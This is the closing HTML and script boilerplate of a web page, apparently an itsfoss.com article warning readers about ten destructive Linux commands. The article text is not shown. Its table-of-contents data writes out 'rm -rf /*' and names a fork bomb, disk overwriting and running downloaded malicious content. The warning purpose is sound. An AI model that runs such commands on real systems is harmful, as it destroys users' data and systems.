<path fill-rule="evenodd" clip-rule="evenodd" d="M12.7537 2C7.26076 2 2.80273 6.48 2.80273 12C2.80273 17.52 7.26076 22 12.7537 22C18.2466 22 22.7046 17.52 22.7046 12C22.7046 6.48 18.2466 2 12.7537 2ZM11.7586 7V9H13.7488V7H11.7586ZM11.7586 11V17H13.7488V11H11.7586ZM4.79292 12C4.79292 16.41 8.36531 20 12.7537 20C17.142 20 20.7144 16.41 20.7144 12C20.7144 7.59 17.142 4 12.7537 4C8.36531 4 4.79292 7.59 4.79292 12Z" fill="white" />
</mask>
<g mask="url(#maskInfo)">
<rect x="0.8125" width="23.8823" height="24" fill="#FFFFFF" />
</g>
</svg>
</span>
</a>
</div>
</div>
<div class="jp-carousel-info-extra">
<div class="jp-carousel-info-content-wrapper">
<div class="jp-carousel-photo-title-container">
<h2 class="jp-carousel-photo-title"></h2>
</div>
<div class="jp-carousel-comments-wrapper">
</div>
<div class="jp-carousel-image-meta">
<div class="jp-carousel-title-and-caption">
<div class="jp-carousel-photo-info">
<h3 class="jp-carousel-caption" itemprop="caption description"></h3>
</div>
<div class="jp-carousel-photo-description"></div>
</div>
<ul class="jp-carousel-image-exif" style="display: none;"></ul>
<a class="jp-carousel-image-download" target="_blank" style="display: none;">
<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="3" y="3" width="19" height="18">
<path fill-rule="evenodd" clip-rule="evenodd" d="M5.84615 5V19H19.7775V12H21.7677V19C21.7677 20.1 20.8721 21 19.7775 21H5.84615C4.74159 21 3.85596 20.1 3.85596 19V5C3.85596 3.9 4.74159 3 5.84615 3H12.8118V5H5.84615ZM14.802 5V3H21.7677V10H19.7775V6.41L9.99569 16.24L8.59261 14.83L18.3744 5H14.802Z" fill="white" />
</mask>
<g mask="url(#mask0)">
<rect x="0.870605" width="23.8823" height="24" fill="#FFFFFF" />
</g>
</svg>
<span class="jp-carousel-download-text"></span>
</a>
<div class="jp-carousel-image-map" style="display: none;"></div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
		var by19m9tmzfns6oco_shortcode = true;var pztb1uabhcye9ksm_shortcode = true;		</script>
<link rel='stylesheet' id='kadence-blocks-modal-css' href='https://itsfoss.com/wp-content/plugins/kadence-blocks-pro/dist/build/block-css/style-modal-styles.css?ver=1.7.15' media='all' />
<link rel='stylesheet' id='wpforms-full-css' href='https://itsfoss.com/wp-content/plugins/wpforms/assets/css/wpforms-full.min.css?ver=1.7.6' media='all' />
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/dist/vendor/regenerator-runtime.min.js' id='regenerator-runtime-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/dist/vendor/wp-polyfill.min.js' id='wp-polyfill-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/dist/hooks.min.js' id='wp-hooks-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/dist/i18n.min.js' id='wp-i18n-js'></script>
<script id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script id='presto-components-static-js-extra'>
var prestoComponents = {"url":"https:\/\/itsfoss.com\/wp-content\/plugins\/presto-player\/dist\/components\/web-components\/web-components.esm.js?ver=1659374360"};
var prestoPlayer = {"plugin_url":"https:\/\/itsfoss.com\/wp-content\/plugins\/presto-player\/","logged_in":"","root":"https:\/\/itsfoss.com\/wp-json\/","nonce":"8d340865d0","ajaxurl":"https:\/\/itsfoss.com\/wp-admin\/admin-ajax.php","isAdmin":"","isSetup":{"bunny":{"storage":false,"stream":false}},"proVersion":"1.1.11","isPremium":"1","wpVersionString":"wp\/v2\/","prestoVersionString":"presto-player\/v1\/","debug":"","debug_navigator":"","i18n":{"skip":"Skip","rewatch":"Rewatch","emailPlaceholder":"Email address","emailDefaultHeadline":"Enter your email to play this episode.","chapters":"Chapters","show_chapters":"Show Chapters","hide_chapters":"Hide Chapters","restart":"Restart","rewind":"Rewind {seektime}s","play":"Play","pause":"Pause","fastForward":"Forward {seektime}s","seek":"Seek","seekLabel":"{currentTime} of {duration}","played":"Played","buffered":"Buffered","currentTime":"Current time","duration":"Duration","volume":"Volume","mute":"Mute","unmute":"Unmute","enableCaptions":"Enable captions","disableCaptions":"Disable captions","download":"Download","enterFullscreen":"Enter fullscreen","exitFullscreen":"Exit fullscreen","frameTitle":"Player for {title}","captions":"Captions","settings":"Settings","pip":"PIP","menuBack":"Go back to previous menu","speed":"Speed","normal":"Normal","quality":"Quality","loop":"Loop","start":"Start","end":"End","all":"All","reset":"Reset","disabled":"Disabled","enabled":"Enabled","advertisement":"Ad","qualityBadge":{"2160":"4K","1440":"HD","1080":"HD","720":"HD","576":"SD","480":"SD"},"auto":"AUTO"},"hls_start_level":"480"};
</script>
<script src="https://itsfoss.com/wp-content/plugins/presto-player/src/player/player-static.js?ver=1659374360" defer></script><script id='eafl-public-js-extra'>
var eafl_public = {"home_url":"https:\/\/itsfoss.com\/","ajax_url":"https:\/\/itsfoss.com\/wp-admin\/admin-ajax.php","nonce":"4617b627de"};
</script>
<script src='https://itsfoss.com/wp-content/plugins/easy-affiliate-links/dist/public.js?ver=3.7.0' id='eafl-public-js'></script>
<script id='lasso-ga-js-extra'>
var lassoGA = {"lasso_ga_tracking_id":"UA-24863836-4","lasso_ga_ip_anonymization":"","lasso_ga_send_pageview":"","lasso_version":"306"};
</script>
<script src='https://itsfoss.com/wp-content/plugins/lasso/admin/assets/js/lasso-ga.js?ver=1662694004' id='lasso-ga-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/kadence-blocks/dist/assets/js/simplelightbox.min.js?ver=2.4.14' id='kadence-simplelightbox-js' async></script>
<script src='https://itsfoss.com/wp-content/themes/kadence/assets/js/lightbox-init.min.js?ver=1.1.26' id='kadence-lightbox-init-js' async></script>
<script id='kadence-navigation-js-extra'>
var kadenceConfig = {"screenReader":{"expand":"Expand child menu","collapse":"Collapse child menu"},"breakPoints":{"desktop":"1024","tablet":768},"scrollOffset":"0"};
</script>
<script src='https://itsfoss.com/wp-content/themes/kadence/assets/js/navigation.min.js?ver=1.1.26' id='kadence-navigation-js' async></script>
<script id='tve-dash-frontend-js-extra'>
var tve_dash_front = {"ajaxurl":"https:\/\/itsfoss.com\/wp-admin\/admin-ajax.php","force_ajax_send":"1","is_crawler":"","recaptcha":[],"post_id":"101619"};
</script>
<script src='https://itsfoss.com/wp-content/plugins/thrive-comments/thrive-dashboard/js/dist/frontend.min.js?ver=3.10' id='tve-dash-frontend-js'></script>
<script id='q2w3_fixed_widget-js-extra'>
var q2w3_sidebar_options = [{"sidebar":"sidebar-primary","use_sticky_position":false,"margin_top":10,"margin_bottom":0,"stop_elements_selectors":"genesis-footer-widgets","screen_max_width":0,"screen_max_height":0,"widgets":["#custom_html-4","#custom_html-5"]}];
</script>
<script src='https://itsfoss.com/wp-content/plugins/q2w3-fixed-widget/js/frontend.min.js?ver=6.1.1' id='q2w3_fixed_widget-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-lazy-images/dist/intersection-observer.js?minify=false&#038;ver=83ec8aa758f883d6da14' id='jetpack-lazy-images-polyfill-intersectionobserver-js'></script>
<script id='jetpack-lazy-images-js-extra'>
var jetpackLazyImagesL10n = {"loading_warning":"Images are still loading. Please cancel your print and try again."};
</script>
<script src='https://itsfoss.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-lazy-images/dist/lazy-images.js?minify=false&#038;ver=54eb31dc971b63b49278' id='jetpack-lazy-images-js'></script>
<script>(function(d){var s=d.createElement("script");s.type="text/javascript";s.src="https://a.omappapi.com/app/js/api.min.js";s.async=true;s.id="omapi-script";d.getElementsByTagName("head")[0].appendChild(s);})(document);</script><script src='https://itsfoss.com/wp-content/plugins/aawp/assets/dist/js/main.js?ver=3.18.3' id='aawp-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/underscore.min.js' id='underscore-js'></script>
<script src='https://c0.wp.com/c/6.0.2/wp-includes/js/backbone.min.js' id='backbone-js'></script>
<script id='tcm-frontend-js-js-extra'>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</script>
<script src='https://itsfoss.com/wp-content/plugins/thrive-comments/assets/js/frontend.min.js?ver=2.10' id='tcm-frontend-js-js'></script>
<script id='jetpack-carousel-js-extra'>
var jetpackSwiperLibraryPath = {"url":"https:\/\/itsfoss.com\/wp-content\/plugins\/jetpack\/_inc\/build\/carousel\/swiper-bundle.min.js"};
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/itsfoss.com\/wp-admin\/admin-ajax.php","nonce":"8a41e2a81c","display_exif":"0","display_comments":"0","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/itsfoss.com\/wp-login.php?redirect_to=https%3A%2F%2Fitsfoss.com%2Fdangerous-linux-commands%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"]};
</script>
<script src='https://c0.wp.com/p/jetpack/11.3.1/_inc/build/carousel/jetpack-carousel.min.js' id='jetpack-carousel-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/kadence-blocks-pro/dist/assets/js/splide.min.js?ver=1.7.15' id='kadence-splide-js' async></script>
<script id='kadence-slide-init-js-extra'>
var kadenceSlideConfig = {"of":"of","to":"to","slide":"Slide","next":"Next","prev":"Previous"};
</script>
<script src='https://itsfoss.com/wp-content/themes/kadence/assets/js/splide-init.min.js?ver=1.1.26' id='kadence-slide-init-js' async></script>
<script id='kadence-blocks-table-of-contents-js-extra'>
var kadence_blocks_toc = {"headings":"[{\"anchor\":\"1-rm-rf-\",\"content\":\"1. rm -rf \\\/*\",\"level\":2,\"page\":1},{\"anchor\":\"2-overwrite-your-partition\",\"content\":\"2. Overwrite your partition\",\"level\":2,\"page\":1},{\"anchor\":\"3-move-everything-into-the-void\",\"content\":\"3. Move everything into the void\",\"level\":2,\"page\":1},{\"anchor\":\"4-format-your-hard-drive\",\"content\":\"4. Format your hard drive\",\"level\":2,\"page\":1},{\"anchor\":\"5-fork-bomb\",\"content\":\"5. Fork bomb\",\"level\":2,\"page\":1},{\"anchor\":\"6-overwrite-important-configuration-files\",\"content\":\"6. Overwrite important configuration files\",\"level\":2,\"page\":1},{\"anchor\":\"7-replace-partition-with-garbage-data\",\"content\":\"7. Replace partition with garbage data\",\"level\":2,\"page\":1},{\"anchor\":\"8-expose-your-system-to-everyone\",\"content\":\"8. Expose your system to everyone\",\"level\":2,\"page\":1},{\"anchor\":\"9-download-and-run-malicious-content\",\"content\":\"9. Download and run malicious content\",\"level\":2,\"page\":1},{\"anchor\":\"10-disguised-commands\",\"content\":\"10. Disguised commands\",\"level\":2,\"page\":1},{\"anchor\":\"wrapping-up\",\"content\":\"Wrapping Up\",\"level\":2,\"page\":1}]","expandText":"Expand Table of Contents","collapseText":"Collapse Table of Contents"};
</script>
<script src='https://itsfoss.com/wp-content/plugins/kadence-blocks/dist/assets/js/kb-table-of-contents.min.js?ver=2.4.14' id='kadence-blocks-table-of-contents-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/kadence-blocks-pro/dist/kt-modal-init.js?ver=1.7.15' id='kadence-modal-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/optinmonster/assets/dist/js/helper.min.js?ver=2.9.0' id='optinmonster-wp-helper-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/wpforms/assets/js/wpforms.min.js?ver=1.7.6' id='wpforms-js'></script>
<script id='wpforms-captcha-js-extra'>
var wpforms_captcha = {"max":"15","min":"1","cal":["+","*"],"errorMsg":"Incorrect answer."};
</script>
<script src='https://itsfoss.com/wp-content/plugins/wpforms-captcha/assets/js/wpforms-captcha.min.js?ver=1.5.0' id='wpforms-captcha-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/wpforms/assets/lib/jquery.validate.min.js?ver=1.19.5' id='wpforms-validation-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/wpforms/assets/lib/mailcheck.min.js?ver=1.1.2' id='wpforms-mailcheck-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/wpforms/assets/lib/punycode.min.js?ver=1.0.0' id='wpforms-punycode-js'></script>
<script src='https://itsfoss.com/wp-content/plugins/wpforms/assets/js/utils.min.js?ver=1.7.6' id='wpforms-generic-utils-js'></script>
<script type="text/javascript">
			if(typeof jQuery != "undefined") {
					jQuery('.siq-expsearch-icon').each(function(){
					var searchBox = (jQuery(this).parents('.siq-icon-searchbox-wrap').length > 0) ? jQuery(this).parents('.siq-icon-searchbox-wrap') : jQuery('.siq-menu-searchbox-wrap') ;
					var inputBox = searchBox.find('.siq-expsearch-input');
					
					jQuery(this).on('click', function () {
						if (!searchBox.hasClass('siq-search-open')) {
							searchBox.addClass('siq-search-open');
							inputBox.focus();
						} else {
							searchBox.removeClass('siq-search-open');
							inputBox.focusout();
						}
					});
					jQuery('body').click(function (evt) {
						if (evt.target.id == "siq-menu-searchbox-wrap")
							return;
						if (jQuery(evt.target).closest('#siq-menu-searchbox-wrap').length || jQuery(evt.target).closest('.siq-icon-searchbox-wrap').length)
							return;

						if (searchBox.hasClass('siq-search-open')) {
							searchBox.removeClass('siq-search-open');
						}
					});
				});
			}
		</script>
<meta name="ahrefs-site-verification" content="f8a49089ffadfb2c5b3f7b2e1c37e30d9c7a78c3c78a2d2950300ce64ed9cd27">
<script async defer data-domain="itsfoss.com" src="https://plausible.chmod777.ltd/js/plausible.js"></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpforms_settings = {"val_required":"This field is required.","val_email":"Please enter a valid email address.","val_email_suggestion":"Did you mean {suggestion}?","val_email_suggestion_title":"Click to accept this suggestion.","val_email_restricted":"This email address is not allowed.","val_number":"Please enter a valid number.","val_number_positive":"Please enter a valid positive number.","val_confirm":"Field values do not match.","val_checklimit":"You have exceeded the number of allowed selections: {#}.","val_limit_characters":"{count} of {limit} max characters.","val_limit_words":"{count} of {limit} max words.","val_recaptcha_fail_msg":"Google reCAPTCHA verification failed, please try again later.","val_inputmask_incomplete":"Please fill out the field in required format.","uuid_cookie":"1","locale":"en","wpforms_plugin_url":"https:\/\/itsfoss.com\/wp-content\/plugins\/wpforms\/","gdpr":"","ajaxurl":"https:\/\/itsfoss.com\/wp-admin\/admin-ajax.php","mailcheck_enabled":"1","mailcheck_domains":[],"mailcheck_toplevel_domains":["dev"],"is_ssl":"1","page_title":"10 Destructive Linux Commands You Should Never Run","page_id":"101619","currency_code":"USD","currency_thousands":",","currency_decimals":"2","currency_decimal":".","currency_symbol":"$","currency_symbol_pos":"left","val_requiredpayment":"Payment is required.","val_creditcard":"Please enter a valid credit card number.","val_post_max_size":"The total size of the selected files {totalSize} MB exceeds the allowed limit {maxSize} MB.","val_time12h":"Please enter time in 12-hour AM\/PM format (eg 8:45 AM).","val_time24h":"Please enter time in 24-hour format (eg 22:45).","val_time_limit":"Please enter time between {minTime} and {maxTime}.","val_url":"Please enter a valid URL.","val_fileextension":"File type is not allowed.","val_filesize":"File exceeds max size allowed. File was not uploaded.","post_max_size":"536870912","val_password_strength":"A stronger password is required. Consider using upper and lower case letters, numbers, and symbols.","val_phone":"Please enter a valid phone number.","richtext_add_media_button":"","entry_preview_iframe_styles":["https:\/\/itsfoss.com\/wp-includes\/js\/tinymce\/skins\/lightgray\/content.min.css?ver=6.0.2","https:\/\/itsfoss.com\/wp-includes\/css\/dashicons.min.css?ver=6.0.2","https:\/\/itsfoss.com\/wp-includes\/js\/tinymce\/skins\/wordpress\/wp-content.css?ver=6.0.2"]}
/* ]]> */
</script>
<script type="text/javascript">
        /* <![CDATA[ */
        var aawp_geotargeting_api = "";
        var aawp_geotargeting_settings = {"store":"com","mode":"title"};
        var aawp_geotargeting_localized_stores = {"ca":"ca","de":"de","at":"de","ch":"de","es":"es","fr":"fr","in":"in","it":"it","jp":"co.jp","gb":"co.uk","ie":"co.uk"};
        var aawp_geotargeting_tracking_ids = {"ca":"itsfoss09-20","de":"itsfoss0e-21","fr":"itsfoss02-21","in":" itsfoss0d-21","it":"itsfoss05-21","co.jp":"itsfoss-22","es":"itsfoss04-21","co.uk":"itsfoss03-21"};
        /* ]]> */
    </script>
 <script src='https://stats.wp.com/e-202237.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.3.1',blog:'37237282',post:'101619',tz:'5.5',srv:'itsfoss.com'} ]);
	_stq.push([ 'clickTrackerInit', '37237282', '101619' ]);
</script>
<script type="text/javascript">var omapi_localized = {
			ajax: 'https://itsfoss.com/wp-admin/admin-ajax.php?optin-monster-ajax-route=1',
			nonce: 'f4e01f57ef',
			slugs:
			{"by19m9tmzfns6oco":{"slug":"by19m9tmzfns6oco","mailpoet":false},"pztb1uabhcye9ksm":{"slug":"pztb1uabhcye9ksm","mailpoet":false}}		};</script>
<script type="text/javascript">var omapi_data = {"wc_cart":[],"object_id":101619,"object_key":"post","object_type":"post","term_ids":[350,892],"wp_json":"https:\/\/itsfoss.com\/wp-json"};</script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"7495eb26daab81b1","token":"6d27b61e4f4d41019b514b8b73374672","version":"2022.8.1","si":100}' crossorigin="anonymous"></script>
</body>
</html>
